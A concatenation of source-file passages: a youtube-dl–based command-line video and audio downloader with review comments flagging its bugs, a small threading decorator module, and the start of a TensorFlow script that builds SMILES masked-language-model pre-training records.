        if self.twofactor != '':
            config[self.type]['twofactor'] = self.twofactor
        if self.videopassword != '':
            config[self.type]['videopassword'] = self.videopassword
        if self.proxy != '':
            config[self.type]['proxy'] = self.proxy
        if str(self.geobypass) != "None":
            config[self.type]['geo_bypass'] = self.geobypass
        download.download(self.link, config[self.type],incase_of_error)
        download.output_file(directory[0],titlez[0])

class download():
    # Namespace class: methods are called on the class itself (no self).
    # Some Global Variables And lists
    global recog
    com_reso = []      # [0] = format_id of the best resolution seen for the URL

    # Clear The Screen
    def clear():
        if sys.platform in ['win64','win32']:
            os.system('cls')
        else:
            os.system('clear')

    # Check if the link is alive
    def check_url(url):
        try:
            req.get(url)
        except req.exceptions.ConnectionError:
            print("[!] Please check your network connection.")
            return False
        except req.exceptions.Timeout:
            print("[!] Site is taking too long to load, TimeOut.")
            return False
        except req.exceptions.TooManyRedirects:
            print("[!] Too Many Redirects")
            return False
        except req.exceptions.RequestException as ex:
            # NOTE(review): "[!] " + ex concatenates str with an exception object
            # and would raise TypeError; str(ex) looks intended — confirm.
            print("[!] " + ex)
            sys.exit(0)
        return True

    # Check if my net is alive
    def check_connection(link):
        try:
            req.get(link)
            return True
        except req.exceptions.ConnectionError:
            print("[!] Please check your network connection.")
            return False
        except req.exceptions.HTTPError as error:
            # NOTE(review): same str + exception concatenation issue as check_url.
            print("[!] " + error)
            sys.exit(0)

    # Animation
    def animation(timing='1234',begin=True):
        # spinner/countdown; with begin=True (default) the loop exits immediately
        done = begin
        # for c in itertools.cycle(['|', '/', '-', '\\']):
        for c in range(1,10):
            if done:
                break
            sys.stdout.write('\rTime Is ' + str(c) + timing)
            sys.stdout.flush()
            sl(0.1)
        sys.stdout.write('\rDone! ')
        done = True

    # get the current directory
    # Print where the finished file ended up; dir=None means the cwd.
    def get_current_dir(filename,dir):
        conv = filename.endswith(".webm")
        exts = extension[0]
        if dir is None:
            if conv:
                # ffmpeg will have converted webm -> target extension
                filename = filename.split(".w")[0]+f".{exts}"
                print()
                print("\n" + get_colors.randomize() + "["+get_colors.randomize2()+"!"+get_colors.randomize1()+"]" + get_colors.randomize2() + " Converting Sample From [webm] Format")
                print()
                print(get_colors.randomize() + "["+get_colors.randomize2()+"+"+get_colors.randomize1()+"]" + get_colors.randomize2() + " This Might Take Few Seconds/Minutes")
            if os.path.isfile(filename):
                print()
                # NOTE(review): this f-string contains no placeholder — the saved
                # filename was presumably meant to be interpolated here; confirm.
                print('\n' + get_colors.green() + '[' + get_colors.magento() + '+' + get_colors.green() + ']' + get_colors.randomize2() + " Video Saved Undername "+ get_colors.randomize3() + f"['(unknown)']" + get_colors.white() + '\n')
                print(get_colors.green() + '[' + get_colors.magento() + '+' + get_colors.green() + ']' + get_colors.white() + ' Folder ' + get_colors.randomize() + os.getcwd())
                print()
        else:
            if conv:
                filename = filename.split(".w")[0]+f".{exts}"
                print()
                print("\n" + get_colors.randomize() + "["+get_colors.randomize2()+"!"+get_colors.randomize1()+"]" + get_colors.randomize2() + " Converting Sample From [webm] Format")
                print()
                print(get_colors.randomize() + "["+get_colors.randomize2()+"+"+get_colors.randomize1()+"]" + get_colors.randomize2() + " This Might Take Few Seconds/Minutes")
            if os.path.isfile(filename):
                print()
                # NOTE(review): placeholder-less f-string here as well — confirm.
                print('\n' + get_colors.green() + '[' + get_colors.magento() + '+' + get_colors.green() + ']' + get_colors.randomize2() + " Video Saved Undername "+ get_colors.randomize3() + f"['(unknown)']" + get_colors.white() + '\n')
                print(get_colors.green() + '[' + get_colors.magento() + '+' + get_colors.green() + ']' + get_colors.white() + ' Folder ' + get_colors.randomize() + dir)
                print()

    # Get Downloading Status
    # youtube-dl progress hook: draws percentage while downloading, reports the
    # destination once finished.
    def hooker(t):
        if t['status'] == 'downloading':
            sys.stdout.flush()
            sys.stdout.write('\r' + get_colors.red() +'[' + get_colors.cyan() +'+' + get_colors.red() + ']' + get_colors.randomize1() + ' Progress ' + get_colors.randomize() + str(t['_percent_str']))
            sl(0.1)
        elif t['status'] == 'finished':
            try:
                # NOTE(review): `dict` shadows the builtin inside this method.
                dict = directory[0]
            except:
                dict = None
            download.get_current_dir(t['filename'],dict)

    # List All Available Resolutions
    def user_resolution():
        available = ['4k','2k','1080p','720p','480p','360p']
        return available

    # Download Configurations
    # Base youtube-dl option dicts, keyed by download type; add_values() patches
    # a copy of one of these per run.
    def get_config():
        config = {
            'Audio': {
                'quiet': True,
                'outtmpl': "%(title)s.%(ext)s",
                'writethumbnail': True,
                'progress_hooks': [download.hooker],
                'postprocessors': [{
                    'key': 'FFmpegExtractAudio',
                    'preferredcodec': 'mp3',
                    'preferredquality': '320'},
                    {'key': 'EmbedThumbnail'},
                    {'key': 'FFmpegMetadata'},]
            },
            'Video': {
                'quiet': True,
                'outtmpl': "%(title)s.%(ext)s",
                'noplaylist': True,
                'no_warnings': True,
                'ignoreerrors': True,
                'progress_hooks': [download.hooker],
                'postprocessors': [{
                    'key': 'FFmpegVideoConvertor',
                    'preferedformat': 'mp4',
                }]
            },
            'list': {
                'listsubtitles': True
            },
            'listformat': {
                'lisformats': True
            }
        }
        return config

    # Run youtube-dl with the prepared options; on "format not available"
    # retry once with the generic best format using the `err` snapshot.
    def download(link, data, err):
        try:
            with dl.YoutubeDL(data) as ydl:
                ydl.download([link])
        except dl.utils.ExtractorError:
            print("[!] Exception Occurred While Extracting File ...")
            exit(1)
        except dl.utils.UnsupportedError:
            print("[!] URL Is Not Supported")
            exit(1)
        except dl.utils.GeoRestrictedError:
            print("[!] Video/Audio Is Restricted In Ur Area\n[+] Consider Using [--bypass-geo]")
            exit(1)
        except dl.utils.UnavailableVideoError:
            print("[!] Video/Audio You Requested Is Not Available")
        except dl.utils.DownloadError as e:
            if "Unable to login: Invalid username/password!" in str(e):
                print("\n" + get_colors.randomize() + "["+get_colors.randomize2()+"!"+get_colors.randomize1()+"]" + get_colors.randomize3() + " Can't Login Invalid Username/Password")
            if "requested format not available" in str(e):
                print("\n" + get_colors.randomize() + "["+get_colors.randomize2()+"!"+get_colors.randomize1()+"]" + get_colors.randomize3() + " An Error Occurred While Trying Downloading")
                print(get_colors.randomize() + "["+get_colors.randomize2()+"+"+get_colors.randomize1()+"]" + get_colors.randomize3() + " Trying Automatic Way To Fix The Error")
                # NOTE(review): parser_args.__init__ indexes args[0]..args[15]
                # (16 values) but only 15 are passed here — args[15] (thumbnail)
                # would raise IndexError on this retry path; confirm.
                err = err; s = parser_args(err['Type'],link,'bestvideo+bestaudio/best',err['AFormat'],err['VFormat'],err['VBitrate'],err['Playlist'],err['SExternal'],err['SExternalD'],err['User'],err['Pass'],err['TFactor'],err['VPass'],err['Proxy'],err['GeoBy'])
                s.add_values()

    # Scrape Link Info ['metadata','thumbnail','uploader'....]
    # Extract metadata without downloading; returns (title, duration, format_id, full_info).
    def get_info(link):
        ydl2 = dl.YoutubeDL({'quiet':True,'no_warnings': True,'ignoreerrors': False})
        try:
            result = ydl2.extract_info(link,download=False)
        except dl.utils.DownloadError:
            exit(1)
        if 'entries' in result:
            # playlist: use the first entry only
            video = result['entries'][0]
        else:
            video = result
        video_title = video['title']
        max_reso = video['format_id']
        if 'duration' in result:
            video_size = result['duration']
        else:
            video_size=None
        # video_url = video['url']
        return video_title,video_size,max_reso,result

    # Let's see how lucky you are
    # 1-in-10 chance of the alternate banner... in theory.
    def buggy():
        nums = [1,2,3,4,5,6,7,8,9,10]
        shuffle(nums)
        # NOTE(review): `nums` is a list so `nums == 7` is always False — the
        # banner3 branch is unreachable; `nums[0] == 7` looks intended. The
        # unqualified `buggy()` call inside would also NameError at class scope.
        if nums == 7:
            x = threading.Thread(target=banner3)
            x.start()
            download.clear()
            buggy()
            print()
        else:
            banner4()
            print()

    # URL recognition (Youtube,PH etc)
    # Remember whether the link is a youtube link (class-level flag).
    def url_recognition(link):
        if "youtube" in link:
            download.recog = True
        else:
            download.recog = False

    # Video metadata
    # Print the main menu choices.
    def print_metadata():
        print(get_colors.cyan() + "[" + get_colors.magento() + '0' + get_colors.cyan() + "] " + get_colors.randomize2() + "Download an Audio playlist")
        print(get_colors.cyan() + "[" + get_colors.magento() + '1' + get_colors.cyan() + "] " + get_colors.randomize2() + "Download a Video playlist")
        print(get_colors.cyan() + "[" + get_colors.magento() + '2' + get_colors.cyan() + "] " + get_colors.randomize2() + "Download a Single Audio")
        print(get_colors.cyan() + "[" + get_colors.magento() + '3' + get_colors.cyan() + "] " + get_colors.randomize2() + "Download a single video file")
        print()

    # Video Metadata 2
    # Print title/duration/best-resolution summary line.
    def print_metadata2(title,duration,resolution):
        print(get_colors.randomize() + "Title Video: " +get_colors.randomize1()+ f"{title} " + get_colors.randomize() + "Duration: " + get_colors.green() + f"{duration}" + get_colors.randomize() + " Highest Resolution: " + get_colors.cyan() + f"{resolution}")
        print()

    # User Input
    # Prompt dispatcher: 0=link, 1=menu choice, 2=resolution choice, 3=continue?
    def user_input(option=0):
        if option==0:
            link = input(get_colors.randomize2() + "["+get_colors.randomize3()+"*"+get_colors.randomize1()+"]" + get_colors.randomize2() + " Enter the link: " + get_colors.randomize() + get_colors.white())
            return link
        elif option==1:
            try:
                metadata_inp = int(input(get_colors.randomize2() + "["+get_colors.randomize2()+"------------Enter your choice------------"+get_colors.randomize2()+"]: "))
                return metadata_inp
            except ValueError:
                # NOTE(review): unqualified recursive call — at runtime this
                # raises NameError (should be download.user_input); also the
                # retry's return value is discarded. Confirm.
                user_input(option=1)
        elif option==2:
            try:
                reso_inp = int(input(get_colors.randomize2() + "["+get_colors.randomize2()+"------------Enter your choice------------"+get_colors.randomize2()+"]: "))
                return reso_inp
            except ValueError:
                # NOTE(review): same unqualified recursion issue as above.
                user_input(option=2)
        elif option==3:
            con_inp = str(input(get_colors.white() + "[*] Do You Want To Continue? (Y/n): "))
            return con_inp
        else:
            return

    # Print More Stuff
    # Message dispatcher: 0=unknown choice, 1=bad url, 2=resolution menu,
    # 3=download error, 4=choice out of range.
    def user_print(option=0):
        if option==0:
            print(get_colors.randomize() + "Unknown Choice :(")
        elif option==1:
            print("\n" + get_colors.randomize() + "["+get_colors.randomize2()+"!"+get_colors.randomize1()+"]" + get_colors.randomize3() + " Unvalid Url!!!" + get_colors.randomize2())
            print(get_colors.randomize() + "["+get_colors.randomize1()+"!"+get_colors.randomize2()+"]" + get_colors.randomize2() + " Please Try Again" + get_colors.randomize3())
        elif option==2:
            resolutions = download.user_resolution()
            print(get_colors.randomize() + "[+] Please Select Your Prefered Resolution\n")
            for i in range(0,6):
                print(get_colors.cyan() + "[" + get_colors.magento() + str(i) + get_colors.cyan() + "] " + get_colors.randomize2() + resolutions[i])
            print()
        elif option==3:
            print(get_colors.randomize2() + "DownloadError Occurred !!!")
            print(get_colors.randomize1() + "Re Run The Script With The Same URL And The Same Options To Continue Downloading!")
        elif option==4:
            print(get_colors.randomize1() + "Your Choice Is Out Of Range !")
        else:
            return

    # Shortcuts
    def clear_pr():
        download.clear()
        download.buggy()

    # Type Of Download
    # Map the menu choice to a resolution prompt (video) or preset (audio) and
    # kick off the download.
    def type_down(metadata_inp,link):
        config = download.get_config()
        if metadata_inp in [1,3]:
            download.user_print(option=2)
            reso_inp = download.user_input(option=2)
            # translate menu index -> resolution label
            if str(reso_inp) == '0': reso_inp = '4k'
            if str(reso_inp) == '1': reso_inp = '2k'
            if str(reso_inp) == '2': reso_inp = '1080p'
            if str(reso_inp) == '3': reso_inp = '720p'
            if str(reso_inp) == '4': reso_inp = '480p'
            if str(reso_inp) == '5': reso_inp = '360p'
            if metadata_inp == 1:
                # NOTE(review): get_me_my_stuff declares 20 parameters but these
                # calls pass 19 positional args — verify against the definition.
                download.get_me_my_stuff(link,None,reso_inp,0,False,False,False,False,None,None,None,None,None,None,None,None,'mp4',None,False)
            else:
                download.get_me_my_stuff(link,None,reso_inp,0,True,False,False,False,None,None,None,None,None,None,None,None,'mp4',None,False)
        # NOTE(review): the `else` below pairs with this second `if`, so a valid
        # video choice (1/3) falls through and also prints "Unknown Choice" —
        # an elif chain looks intended; confirm.
        if metadata_inp in [0,2]:
            if metadata_inp == 0:
                download.get_me_my_stuff(link,None,None,0,False,True,False,False,None,None,'320',None,None,None,None,None,None,'mp3',False)
            else:
                download.get_me_my_stuff(link,None,None,0,True,True,False,False,None,None,'320',None,None,None,None,None,None,'mp3',False)
        else:
            download.user_print(option=0)

    # all out
    # Fetch info and format the duration as H:MM:SS; records the best format_id.
    def get_over(link):
        title, duration,reso,result = download.get_info(link)
        if duration is not None:
            duration = int(duration)
            duration = m,s = divmod(duration,60)
            duration = h,m = divmod(duration[0], 60)
            duration = (f'{h:d}:{m:02d}:{s:02d}')
        else:
            duration = None
        download.com_reso.append(reso); return title,duration,reso

    # BannerAndClear
    def bncl():
        download.clear()
        banner()

    # The Holy Engine Of Look
    # Interactive loop: prompt for a link, show the menu, download, repeat.
    def run():
        download.bncl()
        while True:
            try:
                if download.check_url("https://google.com"):
                    link = download.user_input(option=0)
                    if not valid.url(link):
                        download.user_print(option=1)
                        exit(1)
                    if download.check_connection(link):
                        download.bncl()
                        download.print_metadata()
                        metadata_inp = download.user_input(option=1)
                        download.type_down(metadata_inp,link)
                        con_inp = download.user_input(option=3)
                        if con_inp in ['Y','y']:
                            download.bncl()
                            continue
                        elif con_inp in ['N', 'n']:
                            print("\n[+] Cya Next Time")
                            exit(1)
                        else:
                            download.user_print(option=0)
                            continue
            except dl.utils.DownloadError:
                download.bncl()
                print(get_colors.randomize2() + "DownloadError Occurred !!!")
                print(get_colors.randomize1() + "Re Run The Script With The Same URL And The Same Options To Continue Downloading!")
                exit(1)

    # Command Arguments
    # Build the optparse CLI and return (options, positional_args).
    def command_line():
        usage = "Usage: PrNdOwN [options] url"
        parser = optparse.OptionParser(usage)
        parser.add_option('-c','--cmd', dest="cmd", action="store_true",default=False,help="Use The Traditional Look")
        parser.add_option('-u','--url', dest="url",type="string",help="Video / Audio Url")
        parser.add_option('-C','--config',dest='conf',action="store_true",default=False,help="Read And Use The Config File")
        parser.add_option('-q','--quiet',dest='verbose',action='store_true',default=False,help="Don't print status messages")
        parser.add_option('-f','--file',dest='file',type='string',help='Read a file contains a list of urls then download them all')
        parser.add_option('-o','--output',dest='output',type='string',help='Output File Location')
        parser.add_option('-s','--aria2c',dest='speed',action='store_true',default=False,help='Use External Downlaod (Aria2c)')
        parser.add_option('-t','--external',dest='external',type='string',help='Use Prevered External Downloader (wget,curl,ffmpeg ...)')
        parser.add_option('-T','--external-args',dest='external_args',type='string',help='Set Prevered External Download Args')
        parser.add_option('-r','--config-file',dest='config_file',type='string',help='Use Config file of Your Choice')
        parser.add_option('--proxy',dest='proxy',type='string',help='Proxy To Use')
        parser.add_option('--geobypass',dest='geobypass',action='store_true',default=False,help='Geo Location Bypass')
        group = optparse.OptionGroup(parser, "Video / Audio", "This Options Can Be Used To Select Video / Audio Like Quality / Format ...")
        group.add_option('-a','--audio-quality',dest='audio_qual',type='int',help='Specify Audio Quality Between 0 and 1 (0 is the best 1 is the worse)')
        group.add_option('-v','--video-quality',dest='video_qual',type='string',help='Specify Video Quality Between 4k To 360 (4k,2k,1080p,720p,480p,360p)')
        group.add_option('-V','--video-format',dest='videoformat',type='string',help='Video Format To Use ex (mp4,mkv..)')
        group.add_option('-A','--audio-format',dest='audioformat',type='string',help='Audio Format To Use ex (mp3,flac..)')
        group.add_option('-b','--audio-bitrate',dest='aud_bitrate',type='string',help="Audio Bitrate Default (320kbit)")
        group.add_option('-x','--extract-audio',dest='extract',action='store_true',help='Extract Audio From a video source')
        group.add_option('-l','--thumbnail',dest='thumbnail',action='store_true',help='EmbedThumbnail To Video/Audio')
        group.add_option('-p','--playlist',dest='playlist',action="store_true",default=True,help='Download A Playlist With Specified URL')
        parser.add_option_group(group)
        group2 = optparse.OptionGroup(parser, "Authentication Options", "This Options Can Be Used To Set Authentication Method")
        group2.add_option('-U','--username',dest='username',type='string',help='Username To Authenticate With')
        group2.add_option('-P','--password',dest='password',type='string',help='Password To Authenticate With')
        group2.add_option('--twofactor',dest='factor_two',type='string',help='2 Factor Authentication Code')
        group2.add_option('--videopassword',dest='video_password',type='string',help='Video Password To Use')
        parser.add_option_group(group2)
        (options,args) = parser.parse_args()
        return options,args

    # Check Aria2c
    # Resolve the external downloader: aria2c preset when usage=True, otherwise
    # the user-specified tool with split args, else (None, None).
    def aria2c_usage(extr,extr_args,usage=False):
        if usage:
            if spawn.find_executable('aria2c'):
                external = 'aria2c'
                external_args = ['-x16','-k1M']
                return external,external_args
            else:
                print("[!] 'aria2c' Was Not Found ! ");sys.exit(1)
        elif extr != None:
            external = extr
            if extr_args is None:
                extr_args = ['']
            else:
                extr_args = list(extr_args.split(" "))
            external_args = extr_args
            return external,external_args
        else:
            return None,None

    # Use HLS Format
    # If the probed best format is HLS, translate a plain resolution into the
    # matching "hls-<res>" format id.
    def hls_video(quality):
        available_format = download.com_reso[0]
        if "hls" in available_format:
            if quality in ['1080p','720p','480p','360p']:
                hls_qual = f"hls-{quality}"
            else:
                hls_qual = quality
        else:
            return quality
        return hls_qual

    # For Sake of Time
    # Move the finished file; retry with a .mp3 extension (audio extractions).
    def move_file(src,loc):
        try:
            shutil.move(src,loc)
        except:
            try:
                src = src.split(".")[0] + '.mp3'
                shutil.move(src,loc)
            except Exception as e:
                print("File not found ! Thus We Cannot Move it")
                print(e)

    # Normalize playlist-ish URLs (split on '&') into playlist_link.
    def playlist_checker(link):
        url = link.split("&");lene = len(url)
        if lene==3:
            print("[+] This Playlist Type Is Not Supported")
            print("[+] Going With Video ID {%s} In The Giving URL "%(url[0]).split("=")[1])
            playlist_link.append(url[0])
        elif lene==2:
            playlist_link.append(link)
        else:
            return

    # Where To Save File
    # Move "<title>.<ext>" from the cwd into the chosen output directory.
    def output_file(location,title):
        if platform in ['win64','win32']:
            if location.endswith('\\'):
                pass
            else:
                location = location+"\\"
        # NOTE(review): this '/' check runs on Windows too, appending '/' after
        # the '\\' — an else pairing with the platform check looks intended.
        if location.endswith('/'):
            pass
        else:
            location = location+"/"
        if extension[0] == None:
            extension.clear();extension.append('mp4')
        src = title+"."+extension[0]
        if os.path.isdir(location):
            download.move_file(src,location)
        else:
            print("[!] Directory Not Found")

    # Check If Resolution Matches 4k and 2k
    # Warn when 4k/2k is requested without credentials on non-youtube sites.
    def check_4k_2k(reso,username,password):
        recog = download.recog
        if reso in ["4k","2k"] and str(username) == "None" and str(password) == "None" and recog == True:
            pass
        if reso in ["4k","2k"] and str(username) == "None" and str(password) == "None" and recog == False:
            print(get_colors.red() + "[" + get_colors.white() + "!" + get_colors.red() + "]" + get_colors.white() + " The Platform You're Trying To Download 4k/2k Content From Requires Username/Password \n" + get_colors.sharp_green() + "[" + get_colors.red() + "+" + get_colors.sharp_green() + "]" + get_colors.white() + " It Will Fail Trying To Grab The Content And It Will Defaults Back To The Best Quality Automatically")

    # This is a fix for PH formats changing to hls which messed up everything
    # Find the format_id whose format string contains the WxH for `reso`.
    def check_ph_hls(url,reso):
        a,b,c,r = download.get_info(url)
        r = r['formats']
        if reso == "4k": s = "3840x2160"
        if reso == "2k": s = "2560x1440"
        if reso == "1080p": s = "1920x1080"
        if reso == "720p": s = "1280x720"
        if reso == "480p": s = "854x480"
        # NOTE(review): "426x240" is 240p geometry, not 360p (640x360) — confirm.
        if reso == "360p": s = "426x240"
        for item in r:
            if s in item['format']:
                return item['format_id']

    # Save Few Lines Of Code
    # Probe + print metadata for the URL and remember its title.
    def display_info(url):
        download.url_recognition(url)
        title,duration,resolution = download.get_over(url)
        titlez.append(title)
        download.print_metadata2(title,duration,resolution)
        sl(3)

    # Central dispatcher: validates the URL, resolves the external downloader,
    # picks Video vs Audio flow (quiet or verbose) and hands off to parser_args.
    def get_me_my_stuff(url,output,video_qual,audio_qual,playlist,extract_audio,quiet,aria2c,external,external_args,aud_bitrate,username,password,vid_password,two_factor,proxy,vid_format,aud_format,geobypass,thumbnail):
        if not valid.url(url):
            download.user_print(option=1)
            return
        external,external_args = download.aria2c_usage(external,external_args,aria2c)
        download.playlist_checker(url)
        if playlist_link == []:
            pass
        else:
            url = playlist_link[0]
        if output != None:
            directory.append(output)
        else:
            directory.append(os.getcwd())
        if download.check_url("https://google.com") and download.check_connection(url):
            if quiet == False:
                # verbose flow: banners + metadata display
                if audio_qual == None:
                    audio_qual = randint(2,4)
                if audio_qual >= 0 and video_qual == None and extract_audio == None:
                    video_qual = '1080p'
                if extract_audio == False or extract_audio == None:
                    download.bncl()
                    extension.append(vid_format)
                    download.display_info(url)
                    download.check_4k_2k(video_qual,username,password)
                    if video_qual in ['4k','2k','1080p','720p','480p','360p']:
                        pass
                    else:
                        download.user_print(option=4);exit(1)
                    video_qual = download.check_ph_hls(url,video_qual)
                    video_qual = download.hls_video(video_qual)
                    s = parser_args("Video",url,video_qual,aud_format,vid_format,aud_bitrate,str(playlist),external,external_args,username,password,two_factor,vid_password,proxy,bool(geobypass),thumbnail)
                    s.add_values()
                else:
                    download.bncl()
                    download.display_info(url)
                    extension.append(aud_format)
                    if audio_qual == 0:
                        q = 'bestaudio/best'
                    elif audio_qual == 1:
                        q = 'worstaudio/worst'
                    else:
                        q = 'bestaudio/best'
                    s = parser_args("Audio",url,q,aud_format,None,aud_bitrate,str(playlist),external,external_args,username,password,two_factor,vid_password,proxy,bool(geobypass),thumbnail)
                    s.add_values()
            else:
                # quiet flow: same logic without banners
                if audio_qual == None:
                    audio_qual = randint(2,4)
                if audio_qual >= 0 and video_qual == None and extract_audio == None:
                    video_qual = '1080p'
                if extract_audio == False or extract_audio == None:
                    download.display_info(url)
                    download.check_4k_2k(video_qual,username,password)
                    if video_qual in ['4k','2k','1080p','720p','480p','360p']:
                        pass
                    else:
                        download.user_print(option=4);exit(1)
                    video_qual = download.check_ph_hls(url,video_qual)
                    video_qual = download.hls_video(video_qual)
                    s = parser_args("Video",url,video_qual,aud_format,vid_format,aud_bitrate,str(playlist),external,external_args,username,password,two_factor,vid_password,proxy,bool(geobypass),thumbnail)
                    s.add_values()
                else:
                    extension.append(aud_format)
                    download.display_info(url)
                    if audio_qual == 0:
                        q = 'bestaudio/best'
                    elif audio_qual == 1:
                        q = 'worstaudio/worst'
                    else:
                        q = 'bestaudio/best'
                    s = parser_args("Audio",url,q,aud_format,None,aud_bitrate,str(playlist),external,external_args,username,password,two_factor,vid_password,proxy,bool(geobypass),thumbnail)
                    s.add_values()

    # Probably The all
    # Entry for batch mode: a URL-list file downloads line by line; otherwise a
    # single URL goes straight through.
    def kick_it(file,output,audio_qual,video_qual,aud_bitrate,external,external_args,username,password,video_password,two_factor,proxy,vid_format,aud_format,url=None,quiet=False,extract_audio=False,playlist=False,aria2c=False,geobypass=False,thumbnail=True):
        if url==None and file==None:
            print("[!] Cannot Procced if there's no URL Or File list")
            exit(1)
        else:
            if file != None:
                if os.path.isfile(file):
                    times = 0
                    # NOTE(review): the file is re-opened and re-read on every
                    # iteration, and `list` shadows the builtin; also the
                    # arguments two_factor/video_password are passed in swapped
                    # order relative to get_me_my_stuff's (vid_password,
                    # two_factor) parameters — confirm.
                    while True:
                        with open(file, 'r') as list:
                            url = list.readlines()
                            leng = len(url)
                            if leng > times:
                                url = url[times].strip()
                                download.get_me_my_stuff(url,output,video_qual,audio_qual,playlist,extract_audio,quiet,aria2c,external,external_args,aud_bitrate,username,password,two_factor,video_password,proxy,vid_format,aud_format,geobypass,thumbnail)
                                times += 1
                            else:
                                break
            else:
                # NOTE(review): same two_factor/video_password ordering concern.
                download.get_me_my_stuff(url,output,video_qual,audio_qual,playlist,extract_audio,quiet,aria2c,external,external_args,aud_bitrate,username,password,two_factor,video_password,proxy,vid_format,aud_format,geobypass,thumbnail)

    # The Holy Engine
    def runner():
        options, args = download.command_line()
        url = options.url
        file = options.file
        if url == None:
            try:url = args[0]
            except: pass
        if options.conf or options.config_file != None:
            try:
                config_reader.find_config(options.config_file)
            except:
                config_reader.find_config('config.rc')
            # positional unpacking must match read_config's extend() order
            output = default_conf[0]
            audio_quality = default_conf[3]
            video_quality = default_conf[1]
            vid_format,audio_format = default_conf[11]
            aud_bitrate = default_conf[12]
            quiet = default_conf[5]
            playlist = default_conf[6]
            extract_audio = default_conf[4]
            aria2c = default_conf[7]
            external = default_conf[8]
            external_args = default_conf[9]
            proxy = default_conf[10]
            geobypass = default_conf[13]
            thumbnail = default_conf[14]
            username = options.username
            password = options.password
            vid_password = options.video_password
            factor = options.factor_two
        else:
            output = options.output
            audio_quality = options.audio_qual
            video_quality = options.video_qual
            quiet = options.verbose
            playlist = options.playlist
extract_audio = options.extract aria2c = options.speed external = options.external external_args = options.external_args aud_bitrate = options.aud_bitrate username = options.username password = options.password vid_password = options.video_password factor = options.factor_two proxy = options.proxy vid_format = options.videoformat audio_format = options.audioformat geobypass = options.geobypass thumbnail = options.thumbnail if options.cmd: download.run() download.kick_it(file,output,audio_quality,video_quality,aud_bitrate,external,external_args,username,password,vid_password,factor,proxy,vid_format,audio_format,url,quiet,extract_audio,playlist,aria2c,geobypass,thumbnail)
__init__.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import functools
import threading


class ResultCatcher:
    """Callable wrapper recording the return value (or exception) of ``f``.

    ``threading.Thread`` discards its target's return value, so the thread
    is given this wrapper as the target and the result is read back after
    ``join()``.
    """

    def __init__(self, f):
        self.f = f
        self.val = None  # return value of the last call
        self.exc = None  # exception raised by the last call, if any

    def __call__(self, *args, **kwargs):
        try:
            self.val = self.f(*args, **kwargs)
        except BaseException as e:
            # Remember the failure so the caller's thread can re-raise it;
            # previously it killed the worker thread silently and the
            # decorated call returned None.
            self.exc = e


def run_in_thread(f):
    """Decorator: run ``f`` in a daemon thread and block until it finishes.

    The call is synchronous (start + join), but because the worker is a
    daemon thread the waiting main thread stays interruptible (Ctrl-C).
    The wrapped function's return value is propagated, and an exception
    raised inside the thread is re-raised in the caller.
    """
    @functools.wraps(f)  # preserves __name__, __doc__, __module__, ...
    def run(*args, **kwargs):
        catcher = ResultCatcher(f)
        t = threading.Thread(target=catcher, args=args, kwargs=kwargs)
        t.daemon = True
        t.start()
        t.join()
        if catcher.exc is not None:
            raise catcher.exc
        return catcher.val
    return run
tfrecord_smiles.py
import os
import csv
import json
import pickle
import random
import argparse
import numpy as np
import tensorflow as tf
import _pickle as cPickle
from copy import deepcopy
import collections
from multiprocessing import Process, Manager
from src.pretrain.smiles_util import SmilesTokenizer, Timer

__author__ = 'Bonggun Shin'

# TF1-style command-line flags controlling BERT-like masked-LM pre-training
# data generation for SMILES strings.
flags = tf.flags
FLAGS = flags.FLAGS
flags.DEFINE_float("masked_lm_prob", 0.15, "Masked LM probability.")
flags.DEFINE_integer("max_seq_length", 100, "Maximum sequence length.")
flags.DEFINE_integer("max_predictions_per_seq", 15,
                     "Maximum number of masked LM predictions per sequence.")
flags.DEFINE_integer("random_seed", 12345, "Random seed for data generation.")
flags.DEFINE_string("base_path", "../../data/pretrain", "base path for dataset")
# flags.DEFINE_string("input_file", ",".join(["%s/smiles%02d.txt" % (FLAGS.base_path, n) for n in range(79)]),
#                     "Input raw text file (or comma-separated list of files).")
flags.DEFINE_string("input_file",
                    ",".join(["%s/molecule/smiles%02d.txt" % (FLAGS.base_path, n) for n in range(50)]),
                    "Input raw text file (or comma-separated list of files).")
flags.DEFINE_string(
    "output_dir", "gs://bdti/mbert/tfr",
    "Output TF example file (or comma-separated list of files).")


def create_int_feature(values):
    # Wrap an iterable of ints as a tf.train.Feature (int64 list).
    feature = tf.train.Feature(int64_list=tf.train.Int64List(value=list(values)))
    return feature


def create_float_feature(values):
    # Wrap an iterable of floats as a tf.train.Feature (float list).
    feature = tf.train.Feature(float_list=tf.train.FloatList(value=list(values)))
    return feature


def write_instance_to_example_files(instances, tokenizer, max_seq_length,
                                    max_predictions_per_seq, output_files):
    """Create TF example files from `TrainingInstance`s.

    Instances are serialized as tf.train.Examples and written round-robin
    across the given output shards.
    """
    # Ensure the output directory exists.
    # NOTE(review): os.path.exists/os.makedirs on a "gs://..." output_dir
    # does not create anything on GCS — TFRecordWriter handles gs:// paths
    # itself; confirm this branch is only relevant for local output.
    our_dir = '/'.join(output_files[0].split('/')[:-1])
    if not os.path.exists(our_dir):
        os.makedirs(our_dir)
    writers = []
    for output_file in output_files:
        writers.append(tf.python_io.TFRecordWriter(output_file))
    writer_index = 0
    total_written = 0
    for (inst_index, instance) in enumerate(instances):
        input_ids = tokenizer.convert_tokens_to_ids(instance.tokens)
        input_mask = [1] * len(input_ids)
        assert len(input_ids) <= max_seq_length
        # Zero-pad up to the fixed sequence length; mask 0 marks padding.
        while len(input_ids) < max_seq_length:
            input_ids.append(0)
            input_mask.append(0)
        assert len(input_ids) == max_seq_length
        assert len(input_mask) == max_seq_length
        masked_lm_positions = list(instance.masked_lm_positions)
        masked_lm_ids = tokenizer.convert_tokens_to_ids(instance.masked_lm_labels)
        masked_lm_weights = [1.0] * len(masked_lm_ids)
        # Pad the masked-LM slots; weight 0.0 marks padding predictions.
        while len(masked_lm_positions) < max_predictions_per_seq:
            masked_lm_positions.append(0)
            masked_lm_ids.append(0)
            masked_lm_weights.append(0.0)
        features = collections.OrderedDict()
        features["input_ids"] = create_int_feature(input_ids)
        features["input_mask"] = create_int_feature(input_mask)
        features["masked_lm_positions"] = create_int_feature(masked_lm_positions)
        features["masked_lm_ids"] = create_int_feature(masked_lm_ids)
        features["masked_lm_weights"] = create_float_feature(masked_lm_weights)
        tf_example = tf.train.Example(features=tf.train.Features(feature=features))
        # Round-robin across the output shards.
        writers[writer_index].write(tf_example.SerializeToString())
        writer_index = (writer_index + 1) % len(writers)
        total_written += 1
        # Log the first couple of examples for sanity checking.
        if inst_index < 2:
